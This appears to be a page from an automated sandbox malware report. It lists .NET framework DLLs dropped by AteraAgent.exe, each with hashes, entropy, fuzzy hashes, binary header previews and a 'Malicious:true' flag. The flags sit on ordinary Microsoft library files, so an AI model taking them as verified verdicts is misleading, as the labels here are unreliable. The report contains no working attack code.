                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15400
                                                                                                                                                                                                                                        Entropy (8bit):6.899758032838543
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:LZ4RLWdRfRJ0RZWDeNyb8E9VF6IYijSJIVxlyFG:LZK0pJuImEpYi60o0
                                                                                                                                                                                                                                        MD5:88B0416D84AC74BBE8FD5A5A4CF0A0E6
                                                                                                                                                                                                                                        SHA1:0D158BA1BAA4F015ED81F70196F132F5E3FD08C5
                                                                                                                                                                                                                                        SHA-256:983A680ECC3A12546900C6882115AF8C83E534BA238A329C221001294447EE4F
                                                                                                                                                                                                                                        SHA-512:1893D52DD0E8C8D2A9DBA073D6888DA0972AB9C067C20F061CE8F2988B4A416E2C1763F6959AAE4BEB9D7B0B4FC46CC9DF44F619838FB6120CEB87D41D48B1AE
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............)... ...@....... ...................................@..................................)..O....@..................((...`......h(............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H.......P .......................'......................................BSJB............v4.0.30319......l...0...#~..........#Strings....x.......#US.|.......#GUID...........#Blob......................3......................................................m.....A.{.........U.................T...........#.....l...........>.....'...................u.....u.....u...).u...1.u...9.u...A.u...I.u...Q.u...Y.u...a.u...i.u...q.u.......................#.....+.....3.....;.....C.1...K.Q...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.Compression.ZipFile.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15400
                                                                                                                                                                                                                                        Entropy (8bit):6.797577854527455
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:2Fx+WTIEfW5uP6Nyby2sE9jBF6IYiYF85S35IVnxGUHFz9ZIQOoz:2YWsmWIyNyb8E9VF6IYijSJIVx39mBe
                                                                                                                                                                                                                                        MD5:2857137B07AE003E4409FF3C2877BF8D
                                                                                                                                                                                                                                        SHA1:91968C48E06B6F971A6B53C98BC280441381870F
                                                                                                                                                                                                                                        SHA-256:614777135464E413B1B6F8F5C408B43E6E5247F412DD49DDC1BCB9869F861857
                                                                                                                                                                                                                                        SHA-512:7C9C7D880BDBAEB2F26CAE0F060C525D21041442159EE0C4AF3B1398BED0B04525095E1367C559DA8A4D363DF10245E80C9DD2D15E38B902B41D295713B3BEF9
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0.............*(... ...@....... ...............................(....@..................................'..O....@..@...............((...`.......&............................................... ............... ..H............text...0.... ...................... ..`.rsrc...@....@......................@..@.reloc.......`......................@..B.................(......H.......P ...................... &......................................BSJB............v4.0.30319......l.......#~......D...#Strings....8.......#US.<.......#GUID...L.......#Blob......................3......................................................z.....N.....".....b.................a...........0.....y...........K.....4...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........:.....C.....b...#.k...+.k...3.k...;.....C.....K.....S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.Compression.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):105000
                                                                                                                                                                                                                                        Entropy (8bit):6.382210592092604
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:0vc/U5yNq2oS4Zd0LE3YigSFvhoZO2K3aAYH2TfXmNoJXBA76s:0gk1tiLMYiDFvxqrWDWNoJXBAv
                                                                                                                                                                                                                                        MD5:A0829359A62989682E11D24CC4EBF6D1
                                                                                                                                                                                                                                        SHA1:C88788DC49E75E7749EBAFBD7F4DDF98C0D1A242
                                                                                                                                                                                                                                        SHA-256:7EFCC3AC0DD72EF7C16D28B1359F1FDD68980279FFAA3BAE604190DDE2609248
                                                                                                                                                                                                                                        SHA-512:C9218E628DD1102A283A3C24EF480BCEA55EAECF603C1292387A8CD798DC9DF329A64C3B1AB423364CFA8A5168CE4A9DBCB7C6D6A836AC252A504AD888AF8FB0
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..d...........W... ........... ..............................S.....@.................................5W..O....................r..((...........V............................................... ............... ..H............text....b... ...d.................. ..`.rsrc................f..............@..@.reloc...............p..............@..B................iW......H........................9.......V......................................j~....%-.&(I...s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*2r...p.(....*2r7..p.(....*2rs..p.(....*2r...p.(....*2r...p.(....*2r...p.(....*2r=..p.(....*2r_..p.(....*2r...p.(....*2r...p.(....*2r...

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.FileSystem.DriveInfo.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15400
                                                                                                                                                                                                                                        Entropy (8bit):6.854418584832598
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:xKcuz1W1cWliNyb8E9VF6IYijSJIVxLnFbY:Lu8niEpYi60bm
                                                                                                                                                                                                                                        MD5:D3F7B9A0B11352E419B1CDBCF83015E7
                                                                                                                                                                                                                                        SHA1:12C4D615CC63861DCD6F36E142D61C2BC78A5845
                                                                                                                                                                                                                                        SHA-256:B0B8B8A3C2EE091A771B4B2C845253D40D649405A078BEC4FD52017288B44B68
                                                                                                                                                                                                                                        SHA-512:ADC3092DE4F50DA7E5786DF6DD7A083A4C7B96DE3C2208A2C08EA9F4D670D6F2450CBE3EFCD11CBEBAB858D3CCA921B8A6B3DA9702416FDA87AAEC60246576D1
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............(... ...@....... ....................................@..................................(..O....@..P...............((...`......H'............................................... ............... ..H............text........ ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B.................(......H.......P ..x....................&......................................BSJB............v4.0.30319......l.......#~......H...#Strings....L.......#US.P.......#GUID...`.......#Blob......................3......................................................p.....D.....9.....X.................W...........&.....o...........A.....*...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;. ...C.;...K.[...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.FileSystem.Primitives.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15400
                                                                                                                                                                                                                                        Entropy (8bit):6.8598164148424745
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:w+SWikW0uNyb8E9VF6IYijSJIVxAd5qIAl:w+eGWEpYi60CWl
                                                                                                                                                                                                                                        MD5:AE3A14237FFFAA2318D5C49B9D25384A
                                                                                                                                                                                                                                        SHA1:C60BF9017A83802D6F30F67C10F3F359862F94AF
                                                                                                                                                                                                                                        SHA-256:877A64788C32983750F89E1069E80F18B5E8CA1503BDD133E49166476BAB8AF4
                                                                                                                                                                                                                                        SHA-512:0E0AEC9F717C61853877B2EAAB58BC74C07EA8B65920E80A97F0B2E8B5B8723457E9B6EFD965E25DCFCD93C006371680579B455CE2646A852D153AB104210A08
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............(... ...@....... ...............................|....@..................................(..O....@..P...............((...`......d'............................................... ............... ..H............text........ ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~......X...#Strings....h.......#US.l.......#GUID...|.......#Blob......................3......................................................y.....M...........a.................`.........../.....x...........J.....3...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.!...C.<...K.\...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.FileSystem.Watcher.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15400
                                                                                                                                                                                                                                        Entropy (8bit):6.906965523502173
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:IDxxhREWzgW5APUNyby2sE9jBF6IYiYF85S35IVnxGUHF76am92w:8AWzgWSsNyb8E9VF6IYijSJIVxXfw
                                                                                                                                                                                                                                        MD5:8322245B353A448868701EB5CEFF0366
                                                                                                                                                                                                                                        SHA1:BB03ECD3AD48ED71DC2D74CBF294D106017A0C61
                                                                                                                                                                                                                                        SHA-256:08DD4875CE67D7DD68B8049A35C5D156ECF8E5E609147A64F42B543A8ED69850
                                                                                                                                                                                                                                        SHA-512:307A076DF0487DA10750C0C62FB17ABC4E528CBB98D5C63660DC7D9CD0728EAA58BEDE374BA96EB454FD1FA979AFD35C00F9472231DEDA8B0669392CF53658BA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............)... ...@....... ....................................@.................................p)..O....@..@...............((...`......8(............................................... ............... ..H............text........ ...................... ..`.rsrc...@....@......................@..@.reloc.......`......................@..B.................)......H.......P ..h....................'......................................BSJB............v4.0.30319......l.......#~..d.......#Strings....@.......#US.D.......#GUID...T.......#Blob......................3..................................................C...f.C...:.0...c.....N.................M.................e...........7..... ...................*.....*.....*...).*...1.*...9.*...A.*...I.*...Q.*...Y.*...a.*...i.*...q.*.......................#.....+.....3.....;.....C.9...K.Y...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.FileSystem.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15400
                                                                                                                                                                                                                                        Entropy (8bit):6.8644676373526705
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:JBLRWbYWziZNyb8E9VF6IYijSJIVx7cvS/:JB2xi9EpYi60Yq/
                                                                                                                                                                                                                                        MD5:F6EF07D79AFC7E675FA5EBDCC7D79B7F
                                                                                                                                                                                                                                        SHA1:9B554BD08408D81C7A1C8BF75BC3F14296B434FE
                                                                                                                                                                                                                                        SHA-256:C6BA6C36B72BB0958CB87F31688600C2BBB2C1BADB0F37A736FEA63EF1246D82
                                                                                                                                                                                                                                        SHA-512:785693D1EEF499896C92307D99B09B96C3003B44C8AB8A6309F4AAD11FCDE8E2E05ED473C4035EAA7895B2D65E705F12214DC8112865CB4F490538D0EE49F275
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0.............b)... ...@....... ....................................@..................................)..O....@..................((...`.......'............................................... ............... ..H............text...h.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................D)......H.......P ......................X'......................................BSJB............v4.0.30319......l.......#~..X.......#Strings............#US.........#GUID...........#Blob......................3................................................../...z./...N.....O.....b.................a...........0.....y...........K.....4...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.1...K.Q...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.IsolatedStorage.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15400
                                                                                                                                                                                                                                        Entropy (8bit):6.851248772240086
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:7ZxcMRW4/W5TPPNyby2sE9jBF6IYiYF85S35IVnxGUHFyF5yjfvu:nHW4/W1HNyb8E9VF6IYijSJIVx+ifm
                                                                                                                                                                                                                                        MD5:1674279C744E0AC92C37E8D628AFCC58
                                                                                                                                                                                                                                        SHA1:80BB542E1ACC2772680BCE8DA7877F2E30060964
                                                                                                                                                                                                                                        SHA-256:1826483303E6F886E4E7179FAD0B95992E626CDD0872EAA162F2F1290F752331
                                                                                                                                                                                                                                        SHA-512:4FA1EE9BB253447583021069AB844E0D99F5235BE33684E5F867EE51C171E0B2C0B0F43711525A554EE39A1414FE863CA8C32083608129B294654C35521FA58B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ..............................X.....@..................................(..O....@.. ...............((...`......X'............................................... ............... ..H............text........ ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~......\...#Strings....`.......#US.d.......#GUID...t.......#Blob......................3..................................................+.....+...^.....K.....r.................q.....'.....@.................[.....D...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.6...K.V...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.MemoryMappedFiles.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15400
                                                                                                                                                                                                                                        Entropy (8bit):6.910107223210915
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:4vk7hWmCWKpNyb8E9VF6IYijSJIVxu4kG:4s7/GtEpYi609
                                                                                                                                                                                                                                        MD5:103C951C64757F344A50EEC3AB210780
                                                                                                                                                                                                                                        SHA1:3406E20443764E718D0AD3D0672575B0B514FCFF
                                                                                                                                                                                                                                        SHA-256:49EB49ABA189D221520F2CB0C86160BC917662FF2651CEEB8AF4B2155DE3EE99
                                                                                                                                                                                                                                        SHA-512:DB55DE900E686A43CC68A74B39D9FC48BC4CEF1B504622C6B9BD2687971E45EA689F33B034C1316247355BAB34F7113E6E67FC844922164303AB04E99F87E012
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............)... ...@....... ....................................@.................................h)..O....@..0...............((...`......0(............................................... ............... ..H............text........ ...................... ..`.rsrc...0....@......................@..@.reloc.......`......................@..B.................)......H.......P ..`....................'......................................BSJB............v4.0.30319......l.......#~..H.......#Strings....8.......#US.<.......#GUID...L.......#Blob......................3................................................ .C.....C...w.0...c.............................@.....Y.................t.....]...................*.....*.....*...).*...1.*...9.*...A.*...I.*...Q.*...Y.*...a.*...i.*...q.*.......................#.....+.....3.....;.....C.8...K.X...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.Pipes.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15400
                                                                                                                                                                                                                                        Entropy (8bit):6.876264376456095
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:GUiW2xf+C/WCUW5wP5Nyby2sE9jBF6IYiYF85S35IVnxGUHFLZiDCENuF:0GMWCUWiBNyb8E9VF6IYijSJIVxRFj
                                                                                                                                                                                                                                        MD5:C8207749CB8E4F9DE161977613BB707C
                                                                                                                                                                                                                                        SHA1:3FC2B5274331FD3029A6B406D2F9D78D2167F365
                                                                                                                                                                                                                                        SHA-256:C00FC1D2AF59900AAAC2B8F146519F19E4BAECDE6C2FFB570EB93F0429D67055
                                                                                                                                                                                                                                        SHA-512:3416C0FB1FCF6A647D62C0244B2A2825F91151706CA3D53C687CA6C7CE9B26CE278E752650BC5042368830FD8D89B76B0A40C22114FFB4CC15BFFC9137C5CD47
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............)... ...@....... ..............................V.....@.................................@)..O....@..................((...`.......(............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................t)......H.......P ..8....................'......................................BSJB............v4.0.30319......l.......#~..X.......#Strings............#US. .......#GUID...0.......#Blob......................3..................................................].....]...T.J...}.....h.$.....$.....$...g.$.....$...6.$.....$.....$...Q.....:.$.................D.....D.....D...).D...1.D...9.D...A.D...I.D...Q.D...Y.D...a.D...i.D...q.D.......................#.....+.....3.....;.....C.,...K.L...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.UnmanagedMemoryStream.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15400
                                                                                                                                                                                                                                        Entropy (8bit):6.8553217627762395
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:JBhwI7WSQWEQNyb8E9VF6IYijSJIVxCtgBo6:JDwIBSoEpYi60j
                                                                                                                                                                                                                                        MD5:24D56DB5DDD0839D6A08D68D754B2F5D
                                                                                                                                                                                                                                        SHA1:1E6BCCAC0382417F04B829FC9F64E1988715620A
                                                                                                                                                                                                                                        SHA-256:F8EFFD4778723BD663AC172C09DAEAC2F55727F9865F4D204D275B7A2828907D
                                                                                                                                                                                                                                        SHA-512:B05261B53928A15E38DDB74BEA54FEC7BE183AAAE62BAED261D16FFCE4E63B7229B9940F6BDED12DBBE846B943D1106023C4BAF16D99E823842D9542B26D35F3
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ...............................T....@.................................l(..O....@..P...............((...`......4'............................................... ............... ..H............text........ ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B.................(......H.......P ..d....................&......................................BSJB............v4.0.30319......l.......#~......D...#Strings....8.......#US.<.......#GUID...L.......#Blob......................3......................................................f.....:.....2.....N.................M.................e...........7..... ...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.!...C.<...K.\...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15400
                                                                                                                                                                                                                                        Entropy (8bit):6.867317071449741
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:9yvPRW4lWvKNyb8E9VF6IYijSJIVxnKW/0:E39oKEpYi6050
                                                                                                                                                                                                                                        MD5:E46BF127588B1650BC3567BEACCA140A
                                                                                                                                                                                                                                        SHA1:7517514337BF161472B69EDA4AC146F9ED7614AD
                                                                                                                                                                                                                                        SHA-256:99FA3FF2EB4780EE974A8746F740C5996F1045F96E7B84C0D64043133DE5F1CC
                                                                                                                                                                                                                                        SHA-512:2117C8CE58557196306E01EE3928DCD7C5F621EA363660519AE366D8D9B4DDF2A4E8DF008466416F5C3794B737C53BCD70BFA022196BD35976B063B53914C685
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............)... ...@....... ....................................@..................................)..O....@..................((...`......l(............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H.......P .......................'......................................BSJB............v4.0.30319......l...L...#~..........#Strings............#US.........#GUID...........#Blob......................3......................................................f.....:...........N.................M.................e...........7..... ...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.&...K.F...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Linq.Expressions.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16424
                                                                                                                                                                                                                                        Entropy (8bit):6.820108756272989
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:N6RW6eWX8Nyb8E9VF6IYijSJIVxiAAnvP:N67XcEpYi601AvP
                                                                                                                                                                                                                                        MD5:8474250197D87865E3B304FFCBB871F3
                                                                                                                                                                                                                                        SHA1:66F807BD06287AFC74D288568C2A7A0E8147B108
                                                                                                                                                                                                                                        SHA-256:5ED289F398B5C896E31D02DE4B488A244B791E6133390C13E18DCB70C8F7FADE
                                                                                                                                                                                                                                        SHA-512:0CA7CB50DA69876D3B1FE69A0A177C8DC75D4646DFA8BAABD4FF7D0AF35215B340B40C41F48655BDDB1F05EF5F7454CA03071B30492B0ABC2C32F09B98009686
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............-... ...@....... ...............................Y....@..................................-..O....@..................((...`......P,............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................-......H.......P .......................+......................................BSJB............v4.0.30319......l.......#~..\.......#Strings....\.......#US.`.......#GUID...p.......#Blob......................3......................................5.........c.............z...............(.....E.....................................Q.........../...........b.....b.....b...).b...1.b...9.b...A.b...I.b...Q.b...Y.b...a.b...i.b...q.b.......................#.....+.....3.....;.....C.4...K.T...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Linq.Parallel.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15400
                                                                                                                                                                                                                                        Entropy (8bit):6.852041615311748
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:MSUP9W70WxhNyb8E9VF6IYijSJIVxu1cvO:pUe/lEpYi600D
                                                                                                                                                                                                                                        MD5:CB989B41B2BFDD3D28CCE8D0CDAFB396
                                                                                                                                                                                                                                        SHA1:461A0EC79CF28A3E1D1D0A2458918340230BD668
                                                                                                                                                                                                                                        SHA-256:A142F12BD409D63B0DE3AB42B3B609B2BF1A4919D88D8D127A3DF42BBE32344D
                                                                                                                                                                                                                                        SHA-512:7A866BB5CAC3B1BB68F417D2A1B08B3A8F25F615D48EB9564F538F602A21BEF3239E5E232B7895D54DAFA7A9B5ECDC226B318D97CE0427FCA3542CCA47AFFCFE
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............)... ...@....... ..............................YH....@..................................(..O....@..................((...`.......'............................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H.......P .......................'......................................BSJB............v4.0.30319......l.......#~..,...x...#Strings............#US.........#GUID...........#Blob......................3..................................................&.....&...p.....F.............................9.....R.................m.....V...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.1...K.Q...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Linq.Queryable.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15400
                                                                                                                                                                                                                                        Entropy (8bit):6.851763577766904
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:D8yg07W0/WtTNyb8E9VF6IYijSJIVx/omHC+GK:DBHEPEpYi60A7+5
                                                                                                                                                                                                                                        MD5:F48F964BF4CA09CE820025E8FB9FD286
                                                                                                                                                                                                                                        SHA1:2F0DCFEAEED5DA6B5A3EA412484CBDA1215097B5
                                                                                                                                                                                                                                        SHA-256:B917D1093FC62C8AC7F09C0C5F5F5D6B8819C514CEAE95F1DBCA1C0F6EF3E90F
                                                                                                                                                                                                                                        SHA-512:7220B4A0B5874F6AD2B23F60935CCE8BDA06071F4300678B644BD052E8569DEF5686DEF9EC98D9BEB8868C9C64C7F8BB8B1BF58341B007AB0CADF40C994C4975
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............)... ...@....... ...............................8....@..................................(..O....@..................((...`......x'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~.. ...d...#Strings............#US.........#GUID...........#Blob......................3.................................................."....."...m.....B.............................6.....O.................j.....S.......(...........................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.2...K.R...S.

